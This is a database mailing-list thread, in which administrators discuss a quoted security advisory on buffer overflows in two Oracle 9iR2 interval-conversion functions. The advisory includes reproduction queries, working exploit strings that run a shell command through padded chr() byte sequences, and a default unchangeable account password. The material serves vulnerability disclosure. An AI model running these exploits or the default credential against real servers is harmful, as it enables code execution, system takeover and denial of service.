Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow

Hmmmm.....

Oracle 9.2.0.3 on Win2K, shutdown the instance and the
Oracle service.

Pretty serious bug to me.

mohammed

--- Jared.Still@xxxxxxxxxxx wrote:
> Has anyone here heard of this?
> 
> First I've seen it.  Could not get the exploit to
> work on 8i or 9i, 
> haven't tried 10g.
> 
> It does however cause an ORA-3113.
> 
> Jared
> 
> =================================
> 
> The following security advisory is sent to the
> securiteam mailing list, 
> and can be found at the SecuriTeam web site:
> http://www.securiteam.com 
> - - promotion
> 
> The SecuriTeam alerts list - Free, Accurate,
> Independent.
> 
> Get your security news from a reliable source.
> http://www.securiteam.com/mailinglist.html 
> 
> 
> - - - - - - - - -
> Oracle Database 9ir2 Interval Conversion Buffer
> Overflow 
> Oracle Database Server is one of the most used
> database servers in the 
> world, it was marketed as being unbreakable and many
> people thinks that is 
> one of the most secure database server in the
> market. 
> 
> Oracle Database Server provides two functions that
> can be used with PL/SQL 
> to convert numbers to date/time intervals, these
> functions have buffer 
> overflow vulnerabilities. 
> Vulnerable Systems: 
>  * Oracle Database version 9ir2 and prior 
> 
> When any of these conversion functions are called
> with a long string as a 
> second parameter a buffer overflow occurs. 
> 
> To reproduce the overflow execute the next PL/SQL: 
> SELECT NUMTOYMINTERVAL(1,'longstringhere') from
> dual; 
> SELECT NUMTODSINTERVAL(1,'longstringhere') from
> dual; 
> 
> Any Oracle Database user can exploit this
> vulnerability because access to 
> these functions can't be restricted. Exploitation of
> this vulnerability 
> allow an attacker to execute arbitrary code, also it
> can be exploited to 
> cause DOS (Denial of service) killing Oracle server
> process. An attacker 
> can complete compromise the OS and database if
> Oracle is running on 
> Windows platform, because Oracle must run under the
> local System account 
> or under an administrative account. If Oracle is
> running on *nix then only 
> the database could be compromised because Oracle
> runs mostly under oracle 
> user which has restricted permissions. 
> 
> Important: Exploitation of these vulnerabilities
> becomes easy if Oracle Internet 
> Directory has been deployed, because Oracle Internet
> Directory creates a 
> database user called ODSCOMMON that has a default
> password ODSCOMMON, this 
> password can not be changed, so any attacker can use
> this user to connect 
> to database and exploit these vulnerabilities. 
> 
> Full tests on Oracle database 9ir2 under Microsoft
> Windows 2000 Server and 
> Linux confirm these vulnerabilities. Versions
> running in other OS 
> platforms are believed to be affected too. Previous
> Oracle Database Server 
> versions could be affected by these vulnerabilities.
> 
> 
> Exploits: 
> -- These exploits should work on Windows 2000 Server
> and Windows XP, not 
> tested on Windows 2003. 
> -- Run any command at the end of the string 
> SELECT 
>
NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> || 
> chr(59) || chr(79) || chr(150) || chr(01) ||
> chr(141) || chr(68) || 
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21)
> || chr(52) || chr(35) 
> || chr(148) || chr(01) || chr(255) || chr(37) ||
> chr(172) || chr(33) || 
> chr(148) || chr(01) || chr(32)||'echo ARE YOU SURE?
> >c:\Unbreakable.txt') 
> ?FROM DUAL; 
> 
> SELECT 
>
NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> || 
> chr(59) || chr(79) || chr(150) || chr(01) ||
> chr(141) || chr(68) || 
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21)
> || chr(52) || chr(35) 
> || chr(148) || chr(01) || chr(255) || chr(37) ||
> chr(172) || chr(33) || 
> chr(148) || chr(01) || chr(32) || 'echo ARE YOU
> SURE? 
> >c:\Unbreakable.txt') ? 
> 
> FROM DUAL; 
> 
> Vendor Fix: 
> Go to Oracle Metalink site,
> http://metalink.oracle.com. 
> 
> Vendor Contact: 
> Oracle was contacted and they released a fix without
> telling the public 
> nor Ceaser anything and without issuing an alert. 
> Additional Information: 
> The information has been provided by Cesar. 
>
================================================================================
> 
> 
> 
> 
> 
> 
> This bulletin is sent to members of the SecuriTeam
> mailing list. 
> To unsubscribe from the list, send mail with an
> empty subject line and 
> body to: html-list-unsubscribe@xxxxxxxxxxxxxx 
> In order to subscribe to the mailing list and
> receive advisories in HTML 
> format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx 
> 
>
================================================================================
> 
> 
>
================================================================================
> 
> 
> DISCLAIMER: 
> The information in this bulletin is provided "AS IS"
> without warranty of 
> any kind. 
> In no event shall we be liable for any damages
> whatsoever including 
> direct, indirect, incidental, consequential, loss of
> business profits or 
> special damages. 
> 
> 
> 
> 
> 
> 


__________________________________
Do you Yahoo!?
Get better spam protection with Yahoo! Mail.
http://antispam.yahoo.com/tools
----------------------------------------------------------------
Please see the official ORACLE-L FAQ: http://www.orafaq.com
----------------------------------------------------------------
To unsubscribe send email to:  oracle-l-request@xxxxxxxxxxxxx
put 'unsubscribe' in the subject line.
--
Archives are at http://www.freelists.org/archives/oracle-l/
FAQ is at http://www.freelists.org/help/fom-serve/cache/1.html
-----------------------------------------------------------------

Other related posts: